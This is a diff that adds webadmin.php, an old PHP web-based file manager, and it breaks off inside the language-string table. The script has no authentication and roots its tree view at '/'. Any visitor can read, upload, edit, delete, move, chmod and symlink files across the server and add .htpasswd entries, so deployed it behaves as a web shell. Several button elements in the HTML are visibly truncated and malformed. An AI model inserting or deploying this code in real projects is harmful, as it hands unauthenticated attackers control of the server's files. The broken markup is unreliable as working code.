+<?php
+/*
+ * webadmin.php - a simple Web-based file manager
+ * Copyright (C) 2002  Daniel Wacker <mail@wacker-welt.de>
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *
+/* ------------------------------------------------------------------------- */
+
+/* Select your language:
+ * 'en' - English
+ * 'de' - German
+ * 'cz' - Czech
+ * 'it' - Italian
+ */
+$language = 'en';
+
+/* This directory is shown when you start webadmin.php.
+ * For example: './' would be the current directory.
+ */
+$homedir = './';
+
+/* This sets the root directory of the treeview.
+ * Set it to '/' to see the whole filesystem.
+ */
+$treeroot = '/';
+
+/* When you create a directory, its permission is set to this octal value.
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+$dirpermission = 0705;
+
+/* Uncomment the following line to enable this feature (remove #):
+ * When you create a file, its permission is set to this octal value.
+ * For example: 0644 would be 'drwxr--r--'.
+ */
+# $newfilepermission = 0666;
+
+/* Uncomment the following line to enable this feature (remove #):
+ * When you upload a file, its permission is set to this octal value.
+ * For example: 0644 would be 'drwxr--r--'.
+ */
+# $uploadedfilepermission = 0666;
+
+/* The size of the file edit textarea
+ */
+$editrows = 20;
+$editcols = 70;
+
+/* ------------------------------------------------------------------------- */
+
+$self = htmlentities(basename($_SERVER['PHP_SELF']));
+$homedir = relpathtoabspath($homedir, getcwd());
+$treeroot = relpathtoabspath($treeroot, getcwd());
+$words = getwords($language);
+
+/* If PHP added any slashes, strip them */
+if (ini_get('magic_quotes_gpc')) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+/* Return Images */
+if (isset($_GET['imageid'])) {
+	header('Content-Type: image/gif');
+	echo(getimage($_GET['imageid']));
+	exit;
+}
+
+/* Initialize session */
+ini_set('session.use_cookies', FALSE);
+ini_set('session.use_trans_sid', FALSE);
+session_name('id');
+session_start();
+
+/* Initialize dirlisting output */
+$error = $notice = '';
+$updatetreeview = FALSE;
+
+/* Handle treeview requests */
+if (isset($_REQUEST['action'])) {
+	switch ($_REQUEST['action']) {
+	case 'treeon':
+		$_SESSION['tree'] = array();
+		$_SESSION['hassubdirs'][$treeroot] = tree_hassubdirs($treeroot);
+		tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $treeroot);
+		frameset();
+		exit;
+	case 'treeoff':
+		$_SESSION['tree'] = NULL;
+		$_SESSION['hassubdirs'] = NULL;
+		dirlisting();
+		exit;
+	}
+}
+
+/* Set current directory */
+if (!isset($_SESSION['dir'])) {
+	$_SESSION['dir'] = $homedir;
+	$updatetreeview = TRUE;
+}
+if (!empty($_REQUEST['dir'])) {
+	$newdir = relpathtoabspath($_REQUEST['dir'], $_SESSION['dir']);
+	/* If the requested directory is a file, show the file */
+	if (@is_file($newdir) && @is_readable($newdir)) {
+		/* if (@is_writable($newdir)) {
+			$_REQUEST['edit'] = $newdir;
+		} else */ if (is_script($newdir)) {
+			$_GET['showh'] = $newdir;
+		} else {
+			$_GET['show'] = $newdir;
+		}
+	} elseif ($_SESSION['dir'] != $newdir) {
+		$_SESSION['dir'] = $newdir;
+		$updatetreeview = TRUE;
+	}
+}
+
+/* Show a file */
+if (!empty($_GET['show'])) {
+	$show = relpathtoabspath($_GET['show'], $_SESSION['dir']);
+	if (!show($show)) {
+		$error= buildphrase('&quot;<b>' . htmlentities($show) . '</b>&quot;', $words['cantbeshown']);
+	} else {
+		exit;
+	}
+}
+
+/* Show a file syntax highlighted */
+if (!empty($_GET['showh'])) {
+	$showh = relpathtoabspath($_GET['showh'], $_SESSION['dir']);
+	if (!show_highlight($showh)) {
+		$error = buildphrase('&quot;<b>' . htmlentities($showh) . '</b>&quot;', $words['cantbeshown']);
+	} else {
+		exit;
+	}
+}
+
+/* Upload file */
+if (isset($_FILES['upload'])) {
+	$file = relpathtoabspath($_FILES['upload']['name'], $_SESSION['dir']);
+	if (@is_writable($_SESSION['dir']) && @move_uploaded_file($_FILES['upload']['tmp_name'], $file) && (!isset($uploadedfilepermission) || chmod($file, $uploadedfilepermission))) {
+		$notice = buildphrase(array('&quot;<b>' . htmlentities(basename($file)) . '</b>&quot;', '&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot;'), $words['uploaded']);
+	} else {
+		$error = buildphrase(array('&quot;<b>' . htmlentities(basename($file)) . '</b>&quot;', '&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot;'), $words['notuploaded']);
+	}
+}
+
+/* Create file */
+if (!empty($_GET['create']) && $_GET['type'] == 'file') {
+	$file = relpathtoabspath($_GET['create'], $_SESSION['dir']);
+	if (substr($file, strlen($file) - 1, 1) == '/') $file = substr($file, 0, strlen($file) - 1);
+	if (is_free($file) && touch($file) && ((!isset($newfilepermission)) || chmod($file, $newfilepermission))) {
+		$notice = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['created']);
+		$_REQUEST['edit'] = $file;
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['notcreated']);
+	}
+}
+
+/* Create directory */
+if (!empty($_GET['create']) && $_GET['type'] == 'dir') {
+	$file = relpathtoabspath($_GET['create'], $_SESSION['dir']);
+	if (is_free($file) && @mkdir($file, $dirpermission)) {
+		$notice = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['created']);
+		$updatetreeview = TRUE;
+		if (!empty($_SESSION['tree'])) {
+			$file = spath(dirname($file));
+			$_SESSION['hassubdirs'][$file] = TRUE;
+			tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $file);
+		}
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['notcreated']);
+	}
+}
+
+/* Ask symlink target */
+if (!empty($_GET['symlinktarget']) && empty($_GET['symlink'])) {
+	$symlinktarget = relpathtoabspath($_GET['symlinktarget'], $_SESSION['dir']);
+	html_header($words['createsymlink']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="symlinktarget" value="<?php echo(htmlentities($_GET['symlinktarget'])); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#EEEEEE">
+			<table border="0">
+			<tr>
+				<td valign="top"><?php echo($words['target']); ?>:&nbsp;</td>
+				<td>
+					<b><?php echo(htmlentities($_GET['symlinktarget'])); ?></b><br>
+					<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked>
+					<label for="checkbox_relative"><?php echo($words['reltarget']); ?></label>
+				</td>
+			</tr>
+			<tr>
+				<td><?php echo($words['symlink']); ?>:&nbsp;</td>
+				<td><input type="text" name="symlink" value="<?php echo(htmlentities(spath(dirname($symlinktarget)))); ?>" size="<?php $size = strlen($_GET['symlinktarget']) + 9; if ($size < 30) $size = 30; echo($size);  ?>"></td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['create']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+	html_footer();
+	exit;
+}
+
+/* Create symlink */
+if (!empty($_GET['symlink']) && !empty($_GET['symlinktarget'])) {
+	$symlink = relpathtoabspath($_GET['symlink'], $_SESSION['dir']);
+	$target = $_GET['symlinktarget'];
+	if (@is_dir($symlink)) $symlink = spath($symlink) . basename($target);
+	if ($symlink == $target) {
+		$error = buildphrase(array('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', '&quot;<b>' . htmlentities($target) . '</b>&quot;'), $words['samefiles']);
+	} else {
+		if (@$_GET['relative'] == 'yes') {
+			$target = abspathtorelpath(dirname($symlink), $target);
+		} else {
+			$target = $_GET['symlinktarget'];
+		}
+		if (is_free($symlink) && @symlink($target, $symlink)) {
+			$notice = buildphrase('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', $words['created']);
+		} else {
+			$error = buildphrase('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', $words['notcreated']);
+		}
+	}
+}
+
+/* Delete file */
+if (!empty($_GET['delete'])) {
+	$delete = relpathtoabspath($_GET['delete'], $_SESSION['dir']);
+	if (@$_GET['sure'] == 'TRUE') {
+		if (remove($delete)) {
+			$notice = buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['deleted']);
+		} else {
+			$error = buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['notdeleted']);
+		}
+	} else {
+		html_header($words['delete']);
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#FFFFFF"><?php echo(buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['suredelete'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" align="center" bgcolor="#EEEEEE">
+			<a href="<?php echo("$self?" . SID . '&delete=' . urlencode($delete) . '&sure=TRUE'); ?>">[ <?php echo($words['yes']); ?> ]</a>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</p>
+<?php
+		html_footer();
+		exit;
+	}
+}
+
+/* Change permission */
+if (!empty($_GET['permission'])) {
+	$permission = relpathtoabspath($_GET['permission'], $_SESSION['dir']);
+	if ($p = @fileperms($permission)) {
+		if (!empty($_GET['set'])) {
+			$p = 0; 
+			if (isset($_GET['ur'])) $p |= 0400; if (isset($_GET['uw'])) $p |= 0200; if (isset($_GET['ux'])) $p |= 0100;
+			if (isset($_GET['gr'])) $p |= 0040; if (isset($_GET['gw'])) $p |= 0020; if (isset($_GET['gx'])) $p |= 0010;
+			if (isset($_GET['or'])) $p |= 0004; if (isset($_GET['ow'])) $p |= 0002; if (isset($_GET['ox'])) $p |= 0001;
+			if (@chmod($_GET['permission'], $p)) {
+				$notice = buildphrase(array('&quot<b>' . htmlentities($permission) . '</b>&quot;', '&quot;<b>' . substr(octtostr("0$p"), 1) . '</b>&quot; (<b>' . decoct($p) . '</b>)'), $words['permsset']);
+			} else {
+				$error = buildphrase('&quot;<b>' . htmlentities($permission) . '</b>&quot;', $words['permsnotset']);
+			}
+		} else {
+			html_header($words['permission']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE" colspan="2">
+			<table>
+			<tr>
+				<td><?php echo($words['file']); ?>:</td>
+				<td><input type="text" name="permission" value="<?php echo(htmlentities($permission)); ?>" size="<?php echo(textfieldsize($permission)); ?>"></td>
+				<td><input type="submit" value="<?php echo($words['change']); ?>"></td>
+			</tr>
+			<tr>
+				<td valign="top">
+					<?php echo($words['permission']); ?>:&nbsp;
+					</form><form action="<?php echo($self); ?>" method="get">
+					<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+					<input type="hidden" name="permission" value="<?php echo(htmlentities($permission)); ?>">
+					<input type="hidden" name="set" value="TRUE">
+				</td>
+				<td colspan="2">
+					<table border="0">
+					<tr>
+						<td>&nbsp;</td>
+						<td><?php echo($words['owner']); ?></td>
+						<td><?php echo($words['group']); ?></td>
+						<td><?php echo($words['other']); ?></td>
+					</tr>
+					<tr>
+						<td><?php echo($words['read']); ?>:</td>
+						<td align="center"><input type="checkbox" name="ur" value="1"<?php if ($p & 00400) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="gr" value="1"<?php if ($p & 00040) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="or" value="1"<?php if ($p & 00004) echo(' checked'); ?>></td>
+					</tr>
+					<tr>
+						<td><?php echo($words['write']); ?>:</td>
+						<td align="center"><input type="checkbox" name="uw" value="1"<?php if ($p & 00200) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="gw" value="1"<?php if ($p & 00020) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="ow" value="1"<?php if ($p & 00002) echo(' checked'); ?>></td>
+					</tr>
+					<tr>
+						<td><?php echo($words['exec']); ?>:</td>
+						<td align="center"><input type="checkbox" name="ux" value="1"<?php if ($p & 00100) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="gx" value="1"<?php if ($p & 00010) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="ox" value="1"<?php if ($p & 00001) echo(' checked'); ?>></td>
+					</tr>
+					</table>
+				</td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td colspan="2"><input type="submit" value="<?php echo($words['setperms']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+			html_footer();
+			exit;
+		}
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($permission) . '</b>&quot;', $words['permsnotset']);
+	}
+}
+
+/* Move file */
+if (!empty($_GET['move'])) {
+	$move = relpathtoabspath($_GET['move'], $_SESSION['dir']);
+	if (!empty($_GET['destination'])) {
+		$destination = relpathtoabspath($_GET['destination'], dirname($move));
+		if (@is_dir($destination)) $destination = spath($destination) . basename($move);
+		if ($move == $destination) {
+			$error = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['samefiles']);
+		} else {
+			if (is_free($destination) && @rename($move, $destination)) {
+				$notice = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['moved']);
+			} else {
+				$error = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['notmoved']);
+			}
+		}
+	} else {
+		html_header($words['move']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="move" value="<?php echo(htmlentities($move)); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#EEEEEE">
+			<table border="0">
+			<tr>
+				<td><?php echo($words['file']); ?>:&nbsp;</td>
+				<td><b><?php echo(htmlentities($move)); ?></b></td>
+			</tr>
+			<tr>
+				<td><?php echo($words['moveto']); ?>:&nbsp;</td>
+				<td><input type="text" name="destination" value="<?php echo(htmlentities(spath(dirname($move)))); ?>" size="<?php echo(textfieldsize($move)); ?>"></td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['move']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+		html_footer();
+		exit;
+	}
+}
+
+/* Copy file */
+if (!empty($_GET['cpy'])) {
+	$copy = relpathtoabspath($_GET['cpy'], $_SESSION['dir']);
+	if (!empty($_GET['destination'])) {
+		$destination = relpathtoabspath($_GET['destination'], dirname($copy));
+          if (@is_dir($destination)) $destination = spath($destination) . basename($copy);
+		if ($copy == $destination) {
+			$error = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['samefiles']);
+		} else {
+			if (is_free($destination) && @copy($copy, $destination)) {
+				$notice = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['copied']);
+			} else {
+				$error = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['notcopied']);
+			}
+		}
+	} else {
+		html_header($words['copy']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="cpy" value="<?php echo(htmlentities($copy)); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#EEEEEE">
+			<table border="0">
+			<tr>
+				<td><?php echo($words['file']); ?>:&nbsp;</td>
+				<td><b><?php echo(htmlentities($copy)); ?></b></td>
+			</tr>
+			<tr>
+				<td><?php echo($words['copyto']); ?>:&nbsp;</td>
+				<td><input type="text" name="destination" value="<?php echo(htmlentities(spath(dirname($copy)))); ?>" size="<?php echo(textfieldsize($copy)); ?>"></td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['copy']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+		html_footer();
+		exit;
+	}
+}
+
+/* Save edited file */
+if (!empty($_POST['edit']) && isset($_POST['save'])) {
+	$edit = relpathtoabspath($_POST['edit'], $_SESSION['dir']);
+	if ($f = @fopen($edit, 'w')) {
+		/* write file without carriage returns */
+		fwrite($f, str_replace("\r\n", "\n", $_POST['content']));
+		fclose($f);
+		$notice = buildphrase('&quot;<b>' . htmlentities($edit) . '</b>&quot;', $words['saved']);
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($edit) . '</b>&quot;', $words['notsaved']);
+	}
+}
+
+/* Edit file */
+if (isset($_REQUEST['edit']) && !isset($_POST['save'])) {
+	$file = relpathtoabspath($_REQUEST['edit'], $_SESSION['dir']);
+	if (@is_dir($file)) {
+		/* If the requested file is a directory, show the directory */
+		$_SESSION['dir'] = $file;
+		$updatetreeview = TRUE;
+	} else {
+		if ($f = @fopen($file, 'r')) {
+			html_header($words['edit']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE" colspan="2">
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td><?php echo($words['file']); ?>:&nbsp;</td>
+				<td><input type="text" name="edit" value="<?php echo(htmlentities($file)); ?>" size="<?php echo(textfieldsize($file)); ?>">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['change']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+	<form action="<?php echo($self); ?>" method="post" name="f">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="edit" value="<?php echo(htmlentities($file)); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEFF" align="center"><textarea name="content" rows="<?php echo($editrows); ?>" cols="<?php echo($editcols); ?>" wrap="off" style="background: #EEEEFF; border: none;"><?php
+			if (isset($_POST['content'])) {
+				echo(htmlentities($_POST['content']));
+				if (isset($_POST['add']) && !empty($_POST['username']) && !empty($_POST['password'])) {
+					echo("\n" . htmlentities($_POST['username'] . ':' . crypt($_POST['password'])));
+				}
+			} else {
+				echo(htmlentities(fread($f, filesize($file))));
+			}
+			fclose($f);
+?></textarea></td>
+	</tr>
+<?php if (basename($file) == '.htpasswd') { /* specials with .htpasswd */ ?>
+	<tr>
+		<td bgcolor="#EEEEEE" align="center">
+			<table border="0">
+			<tr>
+				<td><?php echo($words['username']); ?>:&nbsp;</td>
+				<td><input type="text" name="username" size="15">&nbsp;</td>
+				<td><?php echo($words['password']); ?>:&nbsp;</td>
+				<td><input type="password" name="password" size="15">&nbsp;</td>
+				<td><input type="submit" name="add" value="<?php echo($words['add']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+<?php } if (basename($file) == '.htaccess') { /* specials with .htaccess */ ?>
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><input type="button" value="<?php echo($words['addauth']); ?>" 
+	</tr>
+<?php } ?>
+	<tr>
+		<td bgcolor="#EEEEEE" align="center">
+			<input type="button" value="<?php echo($words['reset']); ?>" 
+			<input type="button" value="<?php echo($words['clear']); ?>" '')">
+			<input type="submit" name="save" value="<?php echo($words['save']); ?>">
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+			html_footer();
+			exit;
+		} else {
+			$error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot; ', $words['notopened']);
+		}
+	}
+}
+
+/* Show directory listing (and treeview) */
+if (!empty($_SESSION['tree'])) {
+	if (isset($_REQUEST['frame']) && $_REQUEST['frame'] == 'treeview') {
+		treeview();
+	} else {
+		if (isset($_GET['noupdate'])) $updatetreeview = FALSE;
+		dirlisting(TRUE);
+	}
+} else {
+	dirlisting();
+}
+
+/* ------------------------------------------------------------------------- */
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+function relpathtoabspath ($file, $dir) {
+	$dir = spath($dir);
+	if (substr($file, 0, 1) != '/') $file = $dir . $file;
+	if (!@is_link($file) && ($r = realpath($file)) != FALSE) $file = $r;
+	if (@is_dir($file) && !@is_link($file)) $file = spath($file);
+	return $file;
+}
+
+function abspathtorelpath ($pos, $target) {
+	$pos = spath($pos);
+	$path = '';
+	while ($pos != $target) {
+		if ($pos == substr($target, 0, strlen($pos))) {
+			$path .= substr($target, strlen($pos));
+			break;
+		} else {
+			$path .= '../';
+			$pos = strrev(strstr(strrev(substr($pos, 0, strlen($pos) - 1)), '/'));
+		}
+	}
+	return $path;
+}
+
+function is_script ($file) {
+	return ereg('.php[3-4]?$', $file);
+}
+
+function spath ($path) {
+	if (substr($path, strlen($path) - 1, 1) != '/') $path .= '/';
+	return $path;
+}
+
+function textfieldsize ($str) {
+	$size = strlen($str) + 5;
+	if ($size < 30) $size = 30;
+	return $size;
+}
+
+function is_free ($file) {
+	global $words;
+	if (@file_exists($file) && empty($_GET['overwrite'])) {
+		html_header($words['alreadyexists']);
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#FFFFFF"><?php echo(buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['overwrite'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" align="center" bgcolor="#EEEEEE">
+			<a href="<?php echo("{$_SERVER['REQUEST_URI']}&overwrite=yes"); ?>">[ <?php echo($words['yes']); ?> ]</a>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</p>
+<?php
+		html_footer();
+		exit;
+	}
+	if (!empty($_GET['overwrite'])) {
+		return remove($file);
+	}
+	return TRUE;
+}
+
+function remove ($file) {
+	global $updatetreeview;
+	if (@is_dir($file) && !@is_link($file)) {
+		$error = FALSE;
+		if ($p = @opendir($file = spath($file))) {
+			while (($f = readdir($p)) !== FALSE)
+				if ($f != '.' && $f != '..' && !remove($file . $f))
+					$error = TRUE;
+		}
+		if ($error) $x = FALSE; else $x = @rmdir($file);
+		$updatetreeview = TRUE;
+		if ($x && !empty($_SESSION['tree'])) {
+			$file = spath(dirname($file));
+			$_SESSION['hassubdirs'][$file] = tree_hassubdirs($file);
+			tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $file, TRUE);
+		}
+	} else {
+		$x = @unlink($file);
+	}
+	return $x;
+}
+
+function getwords ($language) {
+	switch ($language) {
+	case 'de':
+		$words['dir'] = 'Verzeichnis'; $words['file'] = 'Datei';
+		$words['filename'] = 'Dateiname'; $words['size'] = 'Gr&ouml;&szlig;e'; $words['permission'] = 'Rechte'; $words['functions'] = 'Funktionen';
+		$words['owner'] = 'Eigner'; $words['group'] = 'Gruppe'; $words['other'] = 'Andere';
+		$words['create'] = 'erstellen'; $words['copy'] = 'kopieren'; $words['copyto'] = 'kopieren nach'; $words['move'] = 'verschieben'; $words['moveto'] = 'verschieben nach'; $words['delete'] = 'l&ouml;schen'; $words['edit'] = 'editieren';
+		$words['read'] = 'lesen'; $words['write'] = 'schreiben'; $words['exec'] = 'ausf&uuml;hren'; $words['change'] = 'wechseln'; $words['upload'] = 'hochladen'; $words['configure'] = 'konfigurieren';
+		$words['yes'] = 'ja'; $words['no'] = 'nein';
+		$words['back'] = 'zur&uuml;ck'; $words['setperms'] = 'Rechte setzen';
+		$words['readingerror'] = 'Fehler beim Lesen von 1';
+		$words['permsset'] = 'Die Rechte von 1 wurden auf 2 gesetzt.'; $words['permsnotset'] = 'Die Rechte von 1 konnten nicht gesetzt werden.';
+		$words['uploaded'] = '1 wurde nach 2 hochgeladen.'; $words['notuploaded'] = '1 konnte nicht nach 2 hochgeladen werden.';
+		$words['moved'] = '1 wurde nach 2 verschoben.'; $words['notmoved'] = '1 konnte nicht nach 2 verschoben werden.';
+		$words['copied'] = '1 wurde nach 2 kopiert.'; $words['notcopied'] = '1 konnte nicht nach 2 kopiert werden.';
+		$words['created'] = '1 wurde erstellt.'; $words['notcreated'] = '1 konnte nicht erstellt werden.';
+		$words['deleted'] = '1 wurde gel&ouml;scht.'; $words['notdeleted'] = '1 konnte nicht gel&ouml;scht werden.'; $words['suredelete'] = '1 wirklich l&ouml;schen?';
+		$words['saved'] = '1 wurde gespeichert.'; $words['notsaved'] = '1 konnte nicht gespeichert werden.';
+		$words['reset'] = 'zur&uuml;cksetzen'; $words['clear'] = 'verwerfen'; $words['save'] = 'speichern';
+		$words['cantbeshown'] = '1 kann nicht angezeigt werden.'; $words['sourceof'] = 'Quelltext von 1';
+		$words['notopened'] = '1 konnte nicht ge&ouml;ffnet werden.';
+		$words['addauth'] = 'Standard-Authentifizierungseinstellungen hinzuf&uuml;gen';
+		$words['username'] = 'Benutzername'; $words['password'] = 'Kennwort'; $words['add'] = 'hinzuf&uuml;gen';
+		$words['treeon'] = 'Baumansicht aktivieren'; $words['treeoff'] = 'Baumansicht deaktivieren';
+		$words['symlink'] = 'Symbolischer Link'; $words['createsymlink'] = 'Link erstellen'; $words['target'] = 'Ziel';
+		$words['reltarget'] = 'Relative Pfadangabe des Ziels';
+		$words['alreadyexists'] = 'Die Datei existiert bereits.';
+		$words['overwrite'] = 'Soll 1 &uuml;berschrieben werden?';
+		$words['samefiles'] = '1 und 2 sind identisch.';
+		break;
+	case 'cz':
+		$words['dir'] = 'Adres&#xE1;&#x0159;'; $words['file'] = 'Soubor';
+		$words['filename'] = 'Jm&#xE9;no souboru'; $words['size'] = 'Velikost'; $words['permission'] = 'Pr&#xE1;va'; $words['functions'] = 'Functions';
+		$words['owner'] = 'Vlastn&#xED;k'; $words['group'] = 'Skupina'; $words['other'] = 'Ostatn&#xED;';
+		$words['create'] = 'vytvo&#x0159;it'; $words['copy'] = 'kop&#xED;rovat'; $words['copyto'] = 'kop&#xED;rovat do'; $words['move'] = 'p&#x0159;esunout'; $words['moveto'] = 'p&#x0159;esunout do'; $words['delete'] = 'odstranit'; $words['edit'] = '&#xFA;pravy';
